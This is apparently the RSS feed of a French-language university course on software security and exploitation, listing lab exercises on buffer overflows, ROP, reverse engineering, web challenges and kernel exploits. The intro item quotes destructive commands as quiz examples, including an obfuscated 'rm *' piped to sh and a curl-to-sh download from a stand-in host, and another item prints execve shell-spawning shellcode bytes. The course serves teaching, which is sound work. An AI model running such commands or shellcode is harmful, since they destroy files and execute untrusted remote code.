<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Cours on INF600C - Sécurité des logiciels et exploitation de vulnérabilités</title>
    <link>https://inf600c.uqam.ca/cours/</link>
    <description>Recent content in Cours on INF600C - Sécurité des logiciels et exploitation de vulnérabilités</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>fr-ca</language>
    <managingEditor>privat.jean@uqam.ca (Jean Privat)</managingEditor>
    <webMaster>privat.jean@uqam.ca (Jean Privat)</webMaster><atom:link href="https://inf600c.uqam.ca/cours/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title></title>
      <link>https://inf600c.uqam.ca/cours/intro/</link>
      <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
      <author>privat.jean@uqam.ca (Jean Privat)</author>
      <guid>https://inf600c.uqam.ca/cours/intro/</guid>
      <description>Revue des logiciels Mettez en relation chacun des concepts suivants dans un graphe/schéma/Mind Map simple. Programme Écriture (programmation) Toolchain Idée Ordinateur Code source Résultats Programmeur Exécution Données (input) Discutez puis donnez votre définition d&amp;rsquo;un bug. Où se situe les bugs dans votre schéma de la question 1? Parmi les exemples suivants lesquels sont des vulnérabilités? rm * echo cm0gKgo= | base64 -d | sh curl http://www.sh4ddy.xyz/rmstar.sh | sh (Le nom du fichier est un bon indice de son contenu) L&amp;rsquo;application checkhost prend un paramètre host et puis vérifie s&amp;rsquo;il répond au ping afin de savoir s&amp;rsquo;il est disponible: curl &#39;http://localhost/checkhost/?</description>
    </item>
    
    <item>
      <title></title>
      <link>https://inf600c.uqam.ca/cours/pwn/</link>
      <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
      <author>privat.jean@uqam.ca (Jean Privat)</author>
      <guid>https://inf600c.uqam.ca/cours/pwn/</guid>
      <description>Pwn Classique Les exercices pour la section sont disponibles sur workspace dans /cours.
Pass 1 Pass 1 sera fait en démonstration. Par contre, à titre de révision, je vous suggère de prendre la peine de refaire Pass 1 dans un débogueur afin de bien comprendre ce qui se passe en mémoire. Assurez vous d&amp;rsquo;être en mesure de bien identifier les variables sur la pile et l&amp;rsquo;effet du débordement sur celles-ci.</description>
    </item>
    
    <item>
      <title></title>
      <link>https://inf600c.uqam.ca/cours/pwn2/</link>
      <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
      <author>privat.jean@uqam.ca (Jean Privat)</author>
      <guid>https://inf600c.uqam.ca/cours/pwn2/</guid>
      <description>Pwn Classique (suite) Les exercices pour la section sont disponibles sur workspace dans /cours.
Shellcode Désassemblez et comprenez le comportement du shellcode suivant:
31 c0 31 d2 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 53 89 e1 b0 0b cd 80 Tracez l&amp;rsquo;exécution du shellcode (état de la pile et des registres) et assurez vous de bien comprendre son fonctionnement. La commande suivante vous sera surement utile.</description>
    </item>
    
    <item>
      <title></title>
      <link>https://inf600c.uqam.ca/cours/rev/</link>
      <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
      <author>privat.jean@uqam.ca (Jean Privat)</author>
      <guid>https://inf600c.uqam.ca/cours/rev/</guid>
      <description>Rétro-ingénierie Désassemblage Introduction À l&amp;rsquo;aide de l&amp;rsquo;aide mémoire Pep/8, désassemblez manuellement le programme suivant: pin1
Aide mémoire Pep/8 (version INF600C)
Le reverse, c&amp;rsquo;est difficile À l&amp;rsquo;aide du même aide mémoire Pep/8, désassemblez le programme suivant, puis faites-en la trace.
C0 FE FE 16 00 0D 70 65 70 38 00 41 00 06 00 0B 58 Pin 2: Des bogues Désassemblez le programme Pep/8 suivant puis trouvez le bon PIN: pin2</description>
    </item>
    
    <item>
      <title></title>
      <link>https://inf600c.uqam.ca/cours/rop/</link>
      <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
      <author>privat.jean@uqam.ca (Jean Privat)</author>
      <guid>https://inf600c.uqam.ca/cours/rop/</guid>
      <description>Pwn Classique (suite) Les exercices pour la section sont disponibles sur workspace dans /cours/05-pwn.
pass_nx Flags 1-4 (Réchauffement) Tentez d&amp;rsquo;obtenir les mêmes 4 flags que pour pass mais sur le programme pass_nx. Qu&amp;rsquo;est-ce qui fait en sorte que chacun de vos exploits marche ou pas. pass_nx Les flags manquants Obtenez les flags manquants pour pass_nx.
Indice 1 Cherchez à réutiliser du code déjà présent dans le programme pour arriver à vos fins.</description>
    </item>
    
    <item>
      <title></title>
      <link>https://inf600c.uqam.ca/cours/web/</link>
      <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
      <author>privat.jean@uqam.ca (Jean Privat)</author>
      <guid>https://inf600c.uqam.ca/cours/web/</guid>
      <description>Exercices Web Configuration du proxy socks5 Lire la documentation et configurer son proxy socks afin d&amp;rsquo;accéder aux défis web dans le lab. Tester la configuration avec votre navigateur en visitant http://workspace.kaa. Tester la configuration avec cURL. curl -x socks5h://localhost:2223 http://workspace.kaa/ Verbes Obtenez le flag à l&amp;rsquo;aide de votre navigateur (En utilisant les outils de développeurs) Obtenez le flag à l&amp;rsquo;aide de cURL Obtenez le flag à l&amp;rsquo;aide de netcat (nc) </description>
    </item>
    
    <item>
      <title>Exploitation noyau</title>
      <link>https://inf600c.uqam.ca/cours/systeme_next/</link>
      <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
      <author>privat.jean@uqam.ca (Jean Privat)</author>
      <guid>https://inf600c.uqam.ca/cours/systeme_next/</guid>
      <description>Noyau des systèmes d&amp;rsquo;exploitation DirtyCOW Présentation sur DirtyCOW Exploit Détails techniques Survol de LiveOverflow Article de Bindecy Meltdown et Spectre Présentation sur Meltdown et Spectre </description>
    </item>
    
    <item>
      <title>Exploitation système</title>
      <link>https://inf600c.uqam.ca/cours/systeme/</link>
      <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
      <author>privat.jean@uqam.ca (Jean Privat)</author>
      <guid>https://inf600c.uqam.ca/cours/systeme/</guid>
      <description>Isolation, permissions et secrets catsecret0 Cet exercice sera fait interactivement en classe. Au cas ou vous vouliez y revenir, le programme est disponible dans les labs: /quetes/cours/02-sys/secret0/catsecret.
cd /quetes/cours/02-sys/secret0/ ./catsecret catsecret1 Le programme est disponible dans les labs: /quetes/cours/02-sys/secret1/catsecret.
cd /quetes/cours/02-sys/secret1/ ./catsecret Indice 1 Qu&#39;est-ce qui est possible avec la permission r sur un exécutable?
Indice 2 man ltrace
Chemins catsecret2 Le programme est disponible dans les labs: /quetes/cours/02-sys/secret2/catsecret. Nous souhaitons lire le second flag.</description>
    </item>
    
  </channel>
</rss>
